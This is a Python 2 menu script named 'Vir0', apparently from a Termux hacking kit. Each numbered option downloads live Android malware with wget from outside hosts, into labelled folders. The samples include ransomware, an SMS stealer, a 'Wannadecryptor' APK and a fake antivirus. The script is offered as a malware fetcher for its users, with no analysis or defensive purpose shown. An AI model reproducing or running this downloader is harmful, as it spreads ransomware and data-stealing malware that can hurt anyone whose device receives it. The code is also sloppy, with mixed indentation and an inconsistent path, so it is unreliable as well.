# !/usr/bin/evn python
# TERMUX OFFICIAL R1 PRODUCTION
# CODEMASTER: *T-H-O*
# HANDLE WITH CAUTION
# DO NOT EXECUTE THE FILES
# ON YOUR PERSONAL DEVICES

import sys
import os
import time
import os as sistema

os.system("clear")
# Set color

R = '\033[1;91m' # Red
N = '\033[1;97m' # White
G = '\033[1;92m' # Green
O = '\033[1;93m' # Orange
B = '\033[1;94m' # Blue
C = '\033[1;96m' # Orange
M = '\033[1;95m' # Orange
X = '\033[1;30m' # Grey

os.system("cd banner;python2 banner4.py")
print
print ("\033[1;49m                   "+N+"Welcome To "+R+"Vir0   \033[0m")
print
print ("\033[1;48m                   "+O+"Author: "+N+"*"+M+"T.O.R1"+N+"*       \033[0m")
print

os.system("cd banner;python2 table.py")

def help():
  print
  print ("\033[44m "+O+"Developer : "+G+"TERMUX"+N+ "OFFICIAL R1"+R+ "ARMY\033[0m")
  print
  print ("\033[44m "+N+"Program   : "+C+"Virus\033[0m")
  print
  print ("\033[44m "+O+"Based On  : "+M+"Python\033[0m")
  print
  main()

def main():
  print
  dr = raw_input("-->>> ")
  if dr == "show options":
    time.sleep(1)
    help()
    main()
    
    ############
    ###VIRUS1###
    ############
  elif dr == "00":
		android = raw_input(""+G+"Virus > ")
		if android == "run":
			time.sleep(1)
			print (""+G+"DroidX Antivirus")
			time.sleep(2)
			print
			print ""+B+"[*] "+N+"Downloading..."
			time.sleep(1)
			os.system("cd virus;mkdir Antivirus;cd Antivirus;wget https://github.com/ashishb/android-malware/raw/master/unclassified_apks/DroidXAntivirus.apk")
			print
			print "Now check Folder Virus on "+R+"/Vir0/virus/Antivirus/"+N+""
			print ""+B+"[*]"+N+"Finished"
			print
			main()
  elif dr == "01":
		rez = raw_input(""+C+"Virus > ")
		if rez == "run":
			time.sleep(1)
			print (""+G+"Freeze")
			print ""+B+"[*]"+N+" Downloading Virus..."
			os.system("cd virus;mkdir freeze;cd freeze;wget http://zumizec-com.waper.co/files/freeze.apk")
			print
			print "Now Check Folder Virus on"+R+" /Vir0/virus/freeze/"
			time.sleep(1)
			print ""+B+"[*]"+N+"Finished"
			print
			main()
  elif dr == "02":
		dea = raw_input(""+C+"Virus > ")
		if dea == "run":
			time.sleep(1)
			print (""+G+"Ransomware")
			print ""+B+"[*]"+N+" Downloading Virus..."
			os.system("cd virus;mkdir androidran;cd androidran;wget http://loolzec.blogwaper.com/files/androidransomware.zip")
			time.sleep(1)
			print
			print "Now check Folder Virus on "+R+"/Vir0/virus/androidran/"
			time.sleep(1)
			print ""+B+"[*]"+N+"Finished"
			print
			main()
  elif dr == "03":
		dea = raw_input(""+C+"Virus > ")
		if dea == "run":
			time.sleep(1)
			print ""+B+"[*]"+N+" Downloading virus..."
			os.system("cd virus;mkdir malware;cd malware;wget http://loolzec.blogwaper.com/files/b.apk")
			time.sleep(1)
			print
			print "Now check Folder Virus on "+R+"/Vir0/virus/malware/"
			time.sleep(1)
			print ""+B+"[*]"+N+"Finished"
			print
			main()
  elif dr == "04":
		dea = raw_input(""+C+"Virus > ")
		if dea == "run":
			time.sleep(1)
			print ""+B+"[*]"+N+" Downloading virus..."
			os.system("cd virus;mkdir Wannadecryptor;cd Wannadecryptor;wget http://loolzec.blogwaper.com/files/wannadecryptor.apk")
			time.sleep(1)
			print
			print "Now check Folder Virus on "+R+"/Vir0/virus/Wannadecryptor/"
			time.sleep(1)
			print ""+B+"[*]"+N+"Finished"
			print
			main()
  elif dr == "05":
		dea = raw_input(""+C+"Virus > ")
		if dea == "run":
			time.sleep(1)
			print ""+B+"[*]"+N+" Downloading virus..."
			os.system("cd virus;mkdir Wannadecryptor2;cd Wannadecryptor2;wget http://loolzec.blogwaper.com/files/wannadecryptor.apk")
			time.sleep(1)
			print
			print "Now check Folder Virus on "+R+"/DarkXploit/virus/Wannadecryptor2/"
			time.sleep(1)
			print ""+B+"[*]"+N+"Finished"
			print
			main()
  elif dr == "06":
		dea = raw_input(""+C+"Virus > ")
		if dea == "run":
			time.sleep(1)
			print ""+B+"[*]"+N+" Downloading virus..."
			os.system("cd virus;mkdir sms_tief;cd sms_tief;wget http://loolzec.blogwaper.com/files/smsthief.apk")
			time.sleep(1)
			print
			print "Now check Folder Virus on "+R+"/Vir0/virus/sms_tief/"
			time.sleep(1)
			print ""+B+"[*]"+N+"Finished"
			main()
  elif dr == "07":
		dea = raw_input(""+C+"Virus > ")
		if dea == "run":
			time.sleep(1)
			print ""+B+"[*]"+N+" Downloading virus..."
			os.system("cd virus;mkdir dangerous-malware;cd dangerous-malware;wget http://loolzec.blogwaper.com/files/y.apk")
			time.sleep(1)
			print
			print "Now check Folder Virus on "+R+"/Vir0/virus/dangerous-malware/"
			time.sleep(1)
			print ""+B+"[*]"+N+"Finished"
			print
			main()
  elif dr == "08":
		dea = raw_input(""+C+"Virus > ")
		if dea == "run":
			time.sleep(1)
			print ""+B+"[*]"+N+" Downloading virus..."
			os.system("cd virus;mkdir malware_enc;cd malware_enc;wget http://loolzec.blogwaper.com/files/30208552a677cce35d4863d3d85b85.apk")
			time.sleep(1)
			print
			print "Now check folder virus on "+R+"/Vir0/virus/malware_enc/"
			time.sleep(1)
			print ""+B+"[*]"+N+"Finished"
			print
			main()
  elif dr == "09":
		dea = raw_input(""+C+"Virus > ")
		if dea == "run":
			time.sleep(1)
			print ""+B+"[*]"+N+" Downloading virus..."
			os.system("cd virus;mkdir malware_bnews;cd malware_bnews;wget http://loolzec.blogwaper.com/files/benews.apk")
			time.sleep(1)
			print
			print "Now check folder virus on "+R+"/Vir0/virus/malware_bnews/"
			time.sleep(1)
			print ""+B+"[*]"+N+"Finished"
			print
			main()
  elif dr == "update vir0":
    print "\n"+M+"~ "+G+"UPDATING..."
    time.sleep(2)
    print
    print "\n"+G+"Cloning Repo...\n"
    time.sleep(6)
    os.system("cd $HOME;rm -rf Vir0;git clone https://github.com/Err0r-ICA/Vir0;cd Vir0;python2 Vir0.py")
    main()
  elif dr == "10":
    time.sleep(1)
    print
    print "\n"+R+"Exiting..."
    time.sleep(1)
    print
    print "\n"+G+"GOODBYE "+X+"*_*\n"
    sys.exit()
  else:
    print ("\nInvalid Input : "),dr
    os.system("cd script;python2 esprint.py")
    print
    main()
if __name__ == "__main__":
	main()

